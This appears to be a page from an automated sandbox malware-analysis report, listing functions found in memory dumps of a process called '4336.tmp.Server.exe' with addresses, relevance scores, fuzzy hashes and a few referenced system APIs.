Opcode Fuzzy Hash: 24e193c79c5ff129ea5f40f53fb1305c11be82c5afff719d59d81796fb011af9
Instruction Fuzzy Hash: 4E317F20F1981E4FE7E6FBA944797BEA9D1EF48310B520079D40DD36E7DD286D418740

Function 00007FFD9B5F1661 Relevance: .1, Instructions: 125COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000005.00000002.2198760779.00007FFD9B5F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B5F0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_7ffd9b5f0000_3CBD.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 6306668cd8e5e3257864dcd70610753551e84dcd9009abda52a1e0e4250e8a25
Instruction ID: 4f59fe4f0904bba0e60a45cfba6c025f49367cda8ac7c1139ecfbe28adb95416
Opcode Fuzzy Hash: 6306668cd8e5e3257864dcd70610753551e84dcd9009abda52a1e0e4250e8a25
Instruction Fuzzy Hash: 44414331B0994D8FDF94FFA8C469AEDBBB1FF68300F550169D00AD76A6CE34A8428740

Function 00007FFD9B5F0AC1 Relevance: .1, Instructions: 123COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000005.00000002.2198760779.00007FFD9B5F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B5F0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_7ffd9b5f0000_3CBD.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: dca29d12471e77c5a2f149107434d9a4c0fb075c46e12203d3c1b9447ca119bc
Instruction ID: 4cdc6e118f86a824aadb6d84804b4c3dbb530834a17f7473bb44b786985c528d
Opcode Fuzzy Hash: dca29d12471e77c5a2f149107434d9a4c0fb075c46e12203d3c1b9447ca119bc
Instruction Fuzzy Hash: D431E431F0991D5FEBE1EB9894657ADBBE1EF48704F0A0176E50DD3292CE2869418780

Function 00007FFD9B5F273D Relevance: .1, Instructions: 121COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000005.00000002.2198760779.00007FFD9B5F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B5F0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_7ffd9b5f0000_3CBD.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 7623a048ca41c27ea75175197c4158cf06cb031cc74004d5de35b0a90bcfad57
Instruction ID: ffa9830d46622d46ddd7667c2e31605d6b9e4a6e370fe7071b5d84ffe434ad91
Opcode Fuzzy Hash: 7623a048ca41c27ea75175197c4158cf06cb031cc74004d5de35b0a90bcfad57
Instruction Fuzzy Hash: AC310970B0A90D4FDFA5EBD498647EABBE0FF08314F450136E40CD31A2DA6AA980C751

Function 00007FFD9B5F0AE0 Relevance: .1, Instructions: 108COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000005.00000002.2198760779.00007FFD9B5F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B5F0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_7ffd9b5f0000_3CBD.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: abb8d7e2d64119128e37b7f86835ca74b66426f7a2ac33ddbe9e490237bbae58
Instruction ID: d24fd45260ba41d2ee200f964c190d2c624e3eb31a950859a3e070f7e5191ebe
Opcode Fuzzy Hash: abb8d7e2d64119128e37b7f86835ca74b66426f7a2ac33ddbe9e490237bbae58
Instruction Fuzzy Hash: C731C031F09D1D4FEBE0EB9894657ADBBE2EF88704F09017AE50DE3296CE246C408780

Function 00007FFD9B5F4519 Relevance: .1, Instructions: 103COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000005.00000002.2198760779.00007FFD9B5F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B5F0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_7ffd9b5f0000_3CBD.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: a5a8bf09614b6e845326ad71f99eb873fa6c90a77d1d35dbe906236c8e8e8bb4
Instruction ID: 58712200b12f3c65b5e564a6c732818528119fb15e560963995cef257c33b4eb
Opcode Fuzzy Hash: a5a8bf09614b6e845326ad71f99eb873fa6c90a77d1d35dbe906236c8e8e8bb4
Instruction Fuzzy Hash: 4A31DF5174F6CE0FD7A3A7AC58606B5AFD5EF57224B0A01FBE089C78A3D8091905C302

Function 00007FFD9B5F41A2 Relevance: .1, Instructions: 101COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000005.00000002.2198760779.00007FFD9B5F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B5F0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_7ffd9b5f0000_3CBD.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: dc58f915b5fc8e2ca469a0c86f15f6ec342a83e0086fc4acd9b5fd9f68b12e59
Instruction ID: 17e8556c296fe1a1484e417797ba8e91aecddc4f8d8068c0abbbb50f22cdd893
Opcode Fuzzy Hash: dc58f915b5fc8e2ca469a0c86f15f6ec342a83e0086fc4acd9b5fd9f68b12e59
Instruction Fuzzy Hash: 28213B31F0EA5D4FEBA6DB698851AE9BFE1EF85310F04017ED049C3592DE15AD42C741

Function 00007FFD9B5F4369 Relevance: .1, Instructions: 100COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000005.00000002.2198760779.00007FFD9B5F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B5F0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_7ffd9b5f0000_3CBD.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: dd8b3832761029b8b2b4cc641b3ada288745178dec286df05604a7e9ca8759f6
Instruction ID: af4077acda02ed1f3d31c3ec0e9e4d773168453cf2c5b29523e88a30d679b7d0
Opcode Fuzzy Hash: dd8b3832761029b8b2b4cc641b3ada288745178dec286df05604a7e9ca8759f6
Instruction Fuzzy Hash: 3821A220F1E91D4FE7E6BBA984797BABAD1EF49310F460079D40DD25A3DD286D418340

Function 00007FFD9B5F28EE Relevance: .1, Instructions: 91COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000005.00000002.2198760779.00007FFD9B5F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B5F0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_7ffd9b5f0000_3CBD.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: b797dc77f1ab1042f970b664a506770696b0be53a10ee881deb941eadb3d7eec
Instruction ID: 002d9d0447d7c81fbdb16e527ff81363870108de797d67a8ca0143b9ec5b0fe8
Opcode Fuzzy Hash: b797dc77f1ab1042f970b664a506770696b0be53a10ee881deb941eadb3d7eec
Instruction Fuzzy Hash: 6231675188F3C61FDB9397B489655C27FF59E87120B0E40EBE5C8CA4A7C54D490AC763

Function 00007FFD9B5F08A9 Relevance: .1, Instructions: 71COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000005.00000002.2198760779.00007FFD9B5F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B5F0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_7ffd9b5f0000_3CBD.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 2ed89f741d312e6ada5594c797bfd1ff3d496be979471c01cb43697822d7492d
Instruction ID: 03580d3d1cee25aa1bd616381a9d705468e4b8981cc5c682915346641997be69
Opcode Fuzzy Hash: 2ed89f741d312e6ada5594c797bfd1ff3d496be979471c01cb43697822d7492d
Instruction Fuzzy Hash: 5E112962B0FAC94FE3EAAA6C14752A8BFA0EF95250F0D01FBD08DC74A7E90419458781

Function 00007FFD9B5F2FE9 Relevance: .1, Instructions: 71COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000005.00000002.2198760779.00007FFD9B5F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B5F0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_7ffd9b5f0000_3CBD.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: c6dbf6a3dba4b4097a39f5e4767373c12288e36092bf65d996a91ada225ecbef
Instruction ID: afacccd005d2d37b0a72241987b73809b956a70a975f31fe4110a3beeaeccac0
Opcode Fuzzy Hash: c6dbf6a3dba4b4097a39f5e4767373c12288e36092bf65d996a91ada225ecbef
Instruction Fuzzy Hash: 50110662B0E8991FF7A69628482DAB63FD9DF9532430A01FBE44CC75A3DC085C428391

Function 00007FFD9B5F4268 Relevance: .1, Instructions: 64COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000005.00000002.2198760779.00007FFD9B5F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B5F0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_7ffd9b5f0000_3CBD.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 9f8a08bf285146c601cf217ffdef079995249cf93c3ddbda60b31e6d6baabb65
Instruction ID: 3eef613d3e3ab7f6a752483e3f11892f01896c454f986a079aabc9aac7103aab
Opcode Fuzzy Hash: 9f8a08bf285146c601cf217ffdef079995249cf93c3ddbda60b31e6d6baabb65
Instruction Fuzzy Hash: 6C11A731F1A91E4AEAF6A6C890617BCF791FF84310F920139D45E839D7CE19BE428681

Function 00007FFD9B5F0850 Relevance: .1, Instructions: 51COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000005.00000002.2198760779.00007FFD9B5F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B5F0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_7ffd9b5f0000_3CBD.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: ceccf85b96e742b50148d674a6fa7d102902aa4c345d130112f4932bfda67adc
Instruction ID: c4f6f23b150a49740ee84497c7898d7ab66f1703073839f2223685f1c2063600
Opcode Fuzzy Hash: ceccf85b96e742b50148d674a6fa7d102902aa4c345d130112f4932bfda67adc
Instruction Fuzzy Hash: F8F09C62F05C1D1FF7E5E61C485DF792ACADFA9655715017AE40DC31A6DC446C428380

Function 00007FFD9B5F15EE Relevance: .0, Instructions: 47COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000005.00000002.2198760779.00007FFD9B5F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B5F0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_7ffd9b5f0000_3CBD.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: e3379cb8d59016ce8aa3f48acd914c428e096c2ec1e6843602c583455735aede
Instruction ID: c25d0b9933232e7e719f14ced1dd8dc2a025f9f928f45b24dfaa129b94b31bcf
Opcode Fuzzy Hash: e3379cb8d59016ce8aa3f48acd914c428e096c2ec1e6843602c583455735aede
Instruction Fuzzy Hash: AFF0AC22B0DA850FE385BBB888AA9647FE1DF94200B0C00BAD849CB1B3CC1CD9834381

Function 00007FFD9B5F1DD3 Relevance: .0, Instructions: 41COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000005.00000002.2198760779.00007FFD9B5F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B5F0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_7ffd9b5f0000_3CBD.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 7aaf590394fb9e47addca2b4beef700cf982fdb977218af9357d243d01296374
Instruction ID: 921857e72ed49b13f67b1f1e487fe5d288b22c631d89762bb4510feff91f2fad
Opcode Fuzzy Hash: 7aaf590394fb9e47addca2b4beef700cf982fdb977218af9357d243d01296374
Instruction Fuzzy Hash: 2EF0E57260E64C1FF7589949AC179F67B98EBC7234F00005EE5CDC2152E15265238355

Function 00007FFD9B5F5827 Relevance: .0, Instructions: 38COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000005.00000002.2198760779.00007FFD9B5F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B5F0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_7ffd9b5f0000_3CBD.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 0e0d2005f51e3fcca6a0ff2fbc89a55d95c2fe03b9f94300253a4aa32792af1b
Instruction ID: 8b0d3e13528354185afdbf5bea9b9f8cad4cefc1fbdc688f13be376d01cd20bf
Opcode Fuzzy Hash: 0e0d2005f51e3fcca6a0ff2fbc89a55d95c2fe03b9f94300253a4aa32792af1b
Instruction Fuzzy Hash: 79F0F012F0D90B0BEBE967AC28366B8A182AF84351F4444BEE40DC66DBDD1CAC459386

Function 00007FFD9B5F0868 Relevance: .0, Instructions: 27COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000005.00000002.2198760779.00007FFD9B5F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B5F0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_7ffd9b5f0000_3CBD.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 1d8a8793900ab3e216e29305c95f68e820f2e8b0be81bd71da052c2eb76ec2f4
Instruction ID: 2cc1d71e237ff41a3f56ce90a5c93d80da36938d72c1c62093ee8c4e523492f1
Opcode Fuzzy Hash: 1d8a8793900ab3e216e29305c95f68e820f2e8b0be81bd71da052c2eb76ec2f4
Instruction Fuzzy Hash: 8CE0D82260F5CC0BD7665B6448205E5BFA0BF41640F0D41F7D05C460A3E91497184281

Function 00007FFD9B5F53CC Relevance: .0, Instructions: 7COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000005.00000002.2198760779.00007FFD9B5F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B5F0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_7ffd9b5f0000_3CBD.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 1f104209219168af60cf07c1045bb6aa821422abf8ff438ad26a28a4c268187b
Instruction ID: 8ad0fcbd54a841d151f58153fb21e6652dd003e0c48567b2fd0940882797b4f4
Opcode Fuzzy Hash: 1f104209219168af60cf07c1045bb6aa821422abf8ff438ad26a28a4c268187b
Instruction Fuzzy Hash: 31C08C30E0A3064FC224E600842AB6DF1104F40211F108279882C022EA9F24510A8900

Analysis Process: 4336.tmp.Server.exePID: 5720, Parent PID: 2580COMMON

Execution Graph

Execution Coverage:	16.6%
Dynamic/Decrypted Code Coverage:	100%
Signature Coverage:	3.3%
Total number of Nodes:	90
Total number of Limit Nodes:	0

Executed Functions

Function 05110B20 Relevance: 1.6, APIs: 1, Instructions: 65libraryCOMMON

Download Yara Rule

APIs

LdrInitializeThunk.NTDLL ref: 05110B6C

Memory Dump Source

Source File: 00000006.00000002.3218817089.0000000005110000.00000040.00000800.00020000.00000000.sdmp, Offset: 05110000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_5110000_4336.jbxd

Similarity

API ID: InitializeThunk
String ID:
API String ID: 2994545307-0
Opcode ID: 6600096910ce003e6e60717324e8a2b77260c89a7aa38445d0c6d92a64823f90
Instruction ID: 2e90a327bc4644e25a24d60db52ea68201dddb365191f1d1a9bbdc10ace4d60a
Opcode Fuzzy Hash: 6600096910ce003e6e60717324e8a2b77260c89a7aa38445d0c6d92a64823f90
Instruction Fuzzy Hash: 26216D34B006158BC714EB68C5987AE77F2EB8C346F2044B9D406EB394DB759C42CB99

Function 00865AC0 Relevance: 1.5, Strings: 1, Instructions: 281COMMON

Download Yara Rule

Strings

\Vnl, xrefs: 00865D77

Memory Dump Source

Source File: 00000006.00000002.3142509139.0000000000860000.00000040.00000800.00020000.00000000.sdmp, Offset: 00860000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_860000_4336.jbxd

Similarity

API ID:
String ID: \Vnl
API String ID: 0-2010404446
Opcode ID: 02d385d260cd8803a465d0c7c75579b6877fc11fc1ece671a4a54565d3917ed6
Instruction ID: b978f4d9165b0ebd4df2aff0aeea71191f9c0495394a788b7e6d03350c660216
Opcode Fuzzy Hash: 02d385d260cd8803a465d0c7c75579b6877fc11fc1ece671a4a54565d3917ed6
Instruction Fuzzy Hash: 29B14A70E006098FDF14CFA9D8957AEBBF2FF88714F258129D815E7294EB749845CB81

Function 00866390 Relevance: .3, Instructions: 266COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000006.00000002.3142509139.0000000000860000.00000040.00000800.00020000.00000000.sdmp, Offset: 00860000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_860000_4336.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 569d9090a579f42e65f77164bf8af5a768367e3f4ab506007a2af715eafc8c35
Instruction ID: 5d4974b5a05ff176081792e63fce744544fd39de568ab0f81f9a4e756a6a0816
Opcode Fuzzy Hash: 569d9090a579f42e65f77164bf8af5a768367e3f4ab506007a2af715eafc8c35
Instruction Fuzzy Hash: 0AB16A70E002498FDF10CFA9D9867AEBBF2FF88314F158129D815EB294EB749855CB85

Function 00861750 Relevance: 6.4, Strings: 5, Instructions: 157
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

Strings

D@|, xrefs: 00861A3B
D@|, xrefs: 0086189C
(bq, xrefs: 00861A2A
d7p, xrefs: 0086179D
Te^q, xrefs: 00861785

Memory Dump Source

Source File: 00000006.00000002.3142509139.0000000000860000.00000040.00000800.00020000.00000000.sdmp, Offset: 00860000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_860000_4336.jbxd

Similarity

API ID:
String ID: (bq$D@|$D@|$Te^q$d7p
API String ID: 0-521794745
Opcode ID: 4707548c42c8a19bfc1b2630259311ac5f744ca19549c0959867b130a1479c48
Instruction ID: a6b9edfed54f56215dbc204a588489af0a328857af8bce77fbb8e07edc3ffd7c
Opcode Fuzzy Hash: 4707548c42c8a19bfc1b2630259311ac5f744ca19549c0959867b130a1479c48
Instruction Fuzzy Hash: EE515C34B101149FCB44DF69C458B5EBBE6FF88700F2581A9E406EB3A6DA75ED018B81

Function 008615B8 Relevance: 3.9, Strings: 3, Instructions: 127
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

Strings

D@|, xrefs: 008616E9
dLdq, xrefs: 008615F3
Hbq, xrefs: 008616D8

Memory Dump Source

Source File: 00000006.00000002.3142509139.0000000000860000.00000040.00000800.00020000.00000000.sdmp, Offset: 00860000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_860000_4336.jbxd

Similarity

API ID:
String ID: D@|$Hbq$dLdq
API String ID: 0-2660850697
Opcode ID: 7c9c47d6593ebf512b9f24e2303026a0a4850f4ac73406426267fa0c5ae6cf3c
Instruction ID: 192de80e42579805599b10fc7a839f85feb1af08cd1b2e49988c56bfb99ec3df
Opcode Fuzzy Hash: 7c9c47d6593ebf512b9f24e2303026a0a4850f4ac73406426267fa0c5ae6cf3c
Instruction Fuzzy Hash: 7641A134B042449FCB05DF69D458B9EBBF2FF89300F1985A9E006EB3A2CA749C05CB91

Function 05115311 Relevance: 3.6, APIs: 1, Strings: 1, Instructions: 61
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

KiUserCallbackDispatcher.NTDLL(00000050), ref: 051153A3

Strings

4'^q, xrefs: 0511535C

Memory Dump Source

Source File: 00000006.00000002.3218817089.0000000005110000.00000040.00000800.00020000.00000000.sdmp, Offset: 05110000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_5110000_4336.jbxd

Similarity

API ID: CallbackDispatcherUser
String ID: 4'^q
API String ID: 2492992576-1614139903
Opcode ID: 51e01c51932ec4a8ffa952d6fa35ae396e9c43c043fa87a0eb8943ba4e3bf83e
Instruction ID: 43d4db446f79015b538a6d64557463d51e7fb5d92aa4b70a96d0d98dccffb18c
Opcode Fuzzy Hash: 51e01c51932ec4a8ffa952d6fa35ae396e9c43c043fa87a0eb8943ba4e3bf83e
Instruction Fuzzy Hash: EC2178B1C04259CFCB10DFA9E944AEEBBB0FB48310F20805AD459B7291C7786945CFA5

Function 05115320 Relevance: 3.6, APIs: 1, Strings: 1, Instructions: 56
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

KiUserCallbackDispatcher.NTDLL(00000050), ref: 051153A3

Strings

4'^q, xrefs: 0511535C

Memory Dump Source

Source File: 00000006.00000002.3218817089.0000000005110000.00000040.00000800.00020000.00000000.sdmp, Offset: 05110000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_5110000_4336.jbxd

Similarity

API ID: CallbackDispatcherUser
String ID: 4'^q
API String ID: 2492992576-1614139903
Opcode ID: 7c37dd8ccf24fb5618eb657bd52f6a7c33a6c3e16b4e8aa306f163a509964964
Instruction ID: 90123a0c76072cf820a7973b0fccf260a187ab5143cde0824de1e1a764af16dc
Opcode Fuzzy Hash: 7c37dd8ccf24fb5618eb657bd52f6a7c33a6c3e16b4e8aa306f163a509964964
Instruction Fuzzy Hash: AA2137B1D042598FCB10DF99E544AEEBBF4FB48320F10845AD819B7240C7796944CFA5

Function 00866DA0 Relevance: 2.7, Strings: 2, Instructions: 230
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

Strings

(bq, xrefs: 00866F20
(bq, xrefs: 00866EF4

Memory Dump Source

Source File: 00000006.00000002.3142509139.0000000000860000.00000040.00000800.00020000.00000000.sdmp, Offset: 00860000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_860000_4336.jbxd

Similarity

API ID:
String ID: (bq$(bq
API String ID: 0-4224401849
Opcode ID: 98a0540808b2a018672cf0b84df10a4a4822ab57b522af6bc5ee61dbdf0b7ade
Instruction ID: 021aa38d2d6e06115de472591049f77b7a183926d07da7e8d56e9b040310f557
Opcode Fuzzy Hash: 98a0540808b2a018672cf0b84df10a4a4822ab57b522af6bc5ee61dbdf0b7ade
Instruction Fuzzy Hash: 5D71D2317042408FC719DF6DE89091EBBE6EFC531071585BAE809CB39AEE35EC458790

Function 008660FC Relevance: 2.7, Strings: 2, Instructions: 180COMMON

Download Yara Rule

Strings

\Vnl, xrefs: 00866177
\Vnl, xrefs: 008662CA

Memory Dump Source

Source File: 00000006.00000002.3142509139.0000000000860000.00000040.00000800.00020000.00000000.sdmp, Offset: 00860000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_860000_4336.jbxd

Similarity

API ID:
String ID: \Vnl$\Vnl
API String ID: 0-659072146
Opcode ID: 0bd97b1f97dbd16d04f80b9052d1599688b43b91b45f3a3f7def590166973767
Instruction ID: cbcef874f01651de92d18093bc637cd36ec83f9e4e40bc704d484c99c61e0c99
Opcode Fuzzy Hash: 0bd97b1f97dbd16d04f80b9052d1599688b43b91b45f3a3f7def590166973767
Instruction Fuzzy Hash: 6E7139B0E002898FDB10CFA9D95179EBBF2FF88314F158129E415E7354EB749856CB91

Function 00866108 Relevance: 2.7, Strings: 2, Instructions: 180COMMON

Download Yara Rule

Strings

\Vnl, xrefs: 00866177
\Vnl, xrefs: 008662CA

Memory Dump Source

Source File: 00000006.00000002.3142509139.0000000000860000.00000040.00000800.00020000.00000000.sdmp, Offset: 00860000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_860000_4336.jbxd

Similarity

API ID:
String ID: \Vnl$\Vnl
API String ID: 0-659072146
Opcode ID: 743cd9edf39f6b9be29f179267bd8deb29388d4ac4980087fe707d13eb7dd4f2
Instruction ID: b31694e9cfc986b7cdbb42bd7bdb81787216024139529290cec9643842911987
Opcode Fuzzy Hash: 743cd9edf39f6b9be29f179267bd8deb29388d4ac4980087fe707d13eb7dd4f2
Instruction Fuzzy Hash: 9B7149B0E002498FDB14CFA9C99179EBBF2FF88314F158129E415E7354EB749856CB81

Function 00867020 Relevance: 2.6, Strings: 2, Instructions: 138COMMON

Download Yara Rule

Strings

Te^q, xrefs: 00867051
dLdq, xrefs: 0086709B

Memory Dump Source

Source File: 00000006.00000002.3142509139.0000000000860000.00000040.00000800.00020000.00000000.sdmp, Offset: 00860000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_860000_4336.jbxd

Similarity

API ID:
String ID: Te^q$dLdq
API String ID: 0-1027511480
Opcode ID: 4349fe8e1e88db9878b5333add2248964bf968a6569384b104df450ef4060cf8
Instruction ID: c6f73ea3e93dcae251e4095b93282f403f203b5867676122b6807400c0b11dd6
Opcode Fuzzy Hash: 4349fe8e1e88db9878b5333add2248964bf968a6569384b104df450ef4060cf8
Instruction Fuzzy Hash: 9E512574B102149FCB44DF69C898A5DBBF6FF89714B2540AAE506DB3B1DA71EC01CB80

Function 008616D7 Relevance: 2.5, Strings: 2, Instructions: 43COMMON

Download Yara Rule

Strings

D@|, xrefs: 008616E9
Hbq, xrefs: 008616D8

Memory Dump Source

Source File: 00000006.00000002.3142509139.0000000000860000.00000040.00000800.00020000.00000000.sdmp, Offset: 00860000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_860000_4336.jbxd

Similarity

API ID:
String ID: D@|$Hbq
API String ID: 0-3684038388
Opcode ID: 3b14001cad56cf45fc71c15057c85f7685173c04a1ac92496a7c3ac24c3e6cba
Instruction ID: ad73f600a46a22868c722e8cef465c3872dfcd28899255d6762a4d4eca338959
Opcode Fuzzy Hash: 3b14001cad56cf45fc71c15057c85f7685173c04a1ac92496a7c3ac24c3e6cba
Instruction Fuzzy Hash: 6EF0C82170C1805FC34A973D541466E6FE2AFC625072945FED149CB357CE288C06C796

Function 00861F3F Relevance: 2.0, Strings: 1, Instructions: 786COMMON

Download Yara Rule

Strings

~|, xrefs: 008629CB

Memory Dump Source

Source File: 00000006.00000002.3142509139.0000000000860000.00000040.00000800.00020000.00000000.sdmp, Offset: 00860000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_860000_4336.jbxd

Similarity

API ID:
String ID: ~|
API String ID: 0-205454835
Opcode ID: f7495302a4270b4a363e9f7a50923afec50970d550c8b3ced677271588a1e507
Instruction ID: e90e021715070d6ba073e108c834960d07416943b85992bacf11d1f510d6f4d4
Opcode Fuzzy Hash: f7495302a4270b4a363e9f7a50923afec50970d550c8b3ced677271588a1e507
Instruction Fuzzy Hash: BC72DC70900218CFDB98DBA4CD94BDE7BB6BF88300F1084A9D14AAB3A5DE345E85DF51

Function 00861F50 Relevance: 2.0, Strings: 1, Instructions: 780COMMON

Download Yara Rule

Strings

~|, xrefs: 008629CB

Memory Dump Source

Source File: 00000006.00000002.3142509139.0000000000860000.00000040.00000800.00020000.00000000.sdmp, Offset: 00860000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_860000_4336.jbxd

Similarity

API ID:
String ID: ~|
API String ID: 0-205454835
Opcode ID: 588f5780bd1a7c2f9ac33b604d7262d7d632a014a7e78b4a411d3cace773dbec
Instruction ID: 2830a8ecfaa989fb65ed23ee209b3cfe967372e7e1c9a2fc33d02376e9c02843
Opcode Fuzzy Hash: 588f5780bd1a7c2f9ac33b604d7262d7d632a014a7e78b4a411d3cace773dbec
Instruction Fuzzy Hash: 2D72DC70900218CFDB98DBA4CD94BDE7BB6BF88300F1084A9D14AAB3A5DE355E85DF51

Function 00868970 Relevance: 1.9, Strings: 1, Instructions: 666COMMON

Download Yara Rule

Strings

fcq, xrefs: 00868A53

Memory Dump Source

Source File: 00000006.00000002.3142509139.0000000000860000.00000040.00000800.00020000.00000000.sdmp, Offset: 00860000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_860000_4336.jbxd

Similarity

API ID:
String ID: fcq
API String ID: 0-2768158334
Opcode ID: 14b8a3cb022497d45c25f422c1528f0c8cbd1778053972e8edb99dbb67707903
Instruction ID: 15ad05b1125ba8dd68cee93f6167ec8a53d9e7dfc219ef696ffd615d068e82dc
Opcode Fuzzy Hash: 14b8a3cb022497d45c25f422c1528f0c8cbd1778053972e8edb99dbb67707903
Instruction Fuzzy Hash: 9352E034A40709DFDB06EBA4D554BAE7FB7FB88300F108814E805377A8CB76A895DB65

Function 0086CB98 Relevance: 1.8, Strings: 1, Instructions: 531COMMON

Download Yara Rule

Strings

d, xrefs: 0086CD78

Memory Dump Source

Source File: 00000006.00000002.3142509139.0000000000860000.00000040.00000800.00020000.00000000.sdmp, Offset: 00860000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_860000_4336.jbxd

Similarity

API ID:
String ID: d
API String ID: 0-2564639436
Opcode ID: 2297d739b5e48af7ac64e4c864320f9f7437f15d3e3132be341950b3cdcfc778
Instruction ID: 75ccfca30a8e1feae27fb49bf69e66a5e2e422b818d2acb44c7fdba6287a6b2a
Opcode Fuzzy Hash: 2297d739b5e48af7ac64e4c864320f9f7437f15d3e3132be341950b3cdcfc778
Instruction Fuzzy Hash: 14322771A00609DFCB14CF69C985BADFBB2FF98304F258629E459DB615D730E895CB80

Function 05110B1F Relevance: 1.6, APIs: 1, Instructions: 65libraryCOMMON

Download Yara Rule

APIs

LdrInitializeThunk.NTDLL ref: 05110B6C

Memory Dump Source

Source File: 00000006.00000002.3218817089.0000000005110000.00000040.00000800.00020000.00000000.sdmp, Offset: 05110000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_5110000_4336.jbxd

Similarity

API ID: InitializeThunk
String ID:
API String ID: 2994545307-0
